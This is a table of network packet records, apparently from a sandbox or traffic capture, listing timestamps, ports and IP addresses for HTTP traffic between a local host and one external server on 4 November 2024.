Nov 4, 2024 07:13:37.690310955 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690321922 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690330982 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690332890 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690350056 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690367937 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690375090 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690395117 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690407038 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690411091 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690449953 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690459013 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690507889 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690517902 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690527916 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690537930 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690548897 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690560102 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690561056 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690570116 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690583944 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690597057 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690599918 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690609932 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690629005 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690639019 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690644979 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690649986 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690660000 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690670967 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690675974 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690680981 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690701008 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690701008 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690718889 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690721035 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690727949 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.690746069 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.690771103 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.733907938 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.733921051 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.733932018 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.733966112 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.733973980 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.733994961 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734035969 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734144926 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734189034 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734198093 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734227896 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734327078 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734338045 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734348059 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734359980 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734375954 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734406948 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734854937 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734869957 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734879971 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.734905005 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.734919071 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.735174894 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.735184908 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.735215902 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.738527060 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.738535881 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.738570929 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.795090914 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.795135021 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.795154095 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.795182943 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.852598906 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852619886 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852631092 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852642059 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852653027 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852668047 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.852703094 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.852961063 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852972031 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.852982044 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853013039 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.853023052 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.853271008 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853296041 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853305101 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853317022 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.853324890 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.853338957 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.853652954 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853663921 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853672981 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853683949 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.853699923 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.853727102 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.857064009 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.857081890 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.857130051 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.913783073 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.913794994 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.913836956 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971159935 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971179962 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971190929 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971215010 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971230030 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971307039 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971344948 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971364975 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971497059 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971508980 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971518993 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971534014 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971558094 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971806049 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971816063 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971827030 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.971849918 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.971859932 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.972189903 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.972201109 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.972210884 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.972223043 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.972234011 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.972237110 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.972255945 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.972276926 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.975518942 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.975557089 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:37.975565910 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:37.975593090 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.032828093 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.032849073 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.032882929 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.032895088 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.089811087 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.089828014 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.089838982 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.089850903 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.089863062 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.089898109 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.089929104 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090086937 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090107918 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090143919 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090276003 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090287924 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090297937 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090312958 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090339899 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090507984 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090517044 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090550900 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090725899 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090742111 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090751886 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090761900 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090766907 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090774059 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.090790033 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.090817928 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.135394096 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.135431051 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.135488033 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.208703995 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208725929 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208736897 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208753109 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208766937 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208779097 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208784103 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.208791971 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208801985 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.208831072 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.208848953 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.209142923 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209152937 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209163904 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209173918 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209184885 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209196091 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.209223986 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.209661007 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209671974 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209681988 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.209707022 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.209717035 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.253768921 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.253822088 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.253834963 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.253881931 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.253881931 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.253892899 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.253923893 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.253935099 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.327203989 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327255964 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327306032 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.327320099 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327332973 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327342987 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327353954 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327368975 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.327383041 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.327754974 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327765942 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327778101 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327790022 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.327795029 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.327820063 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.328208923 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328219891 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328231096 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328242064 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328253031 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328253984 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.328265905 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.328294992 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.328731060 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328739882 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.328773022 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.372359991 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.372371912 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.372412920 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.372442961 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.372457981 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.372471094 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.372482061 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.372498989 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.372519970 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.445864916 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.445887089 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.445897102 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.445930004 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.445959091 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446012020 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446028948 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446042061 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446050882 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446079969 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446327925 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446337938 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446350098 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446361065 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446373940 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446393967 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446713924 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446753025 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446755886 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446882963 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446897984 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446909904 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446919918 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446921110 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446932077 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.446939945 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446957111 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.446980953 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.491075993 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.491091967 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.491102934 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.491154909 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.491178989 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.491182089 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.491194010 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.491204023 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.491229057 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.491250038 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564429045 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564455986 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564481974 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564485073 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564507008 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564529896 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564560890 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564573050 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564583063 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564601898 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564623117 CET | 49787 | 80 | 192.168.2.5 | 141.98.10.40 |
Nov 4, 2024 07:13:38.564915895 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564927101 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564939976 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
Nov 4, 2024 07:13:38.564950943 CET | 80 | 49787 | 141.98.10.40 | 192.168.2.5 |
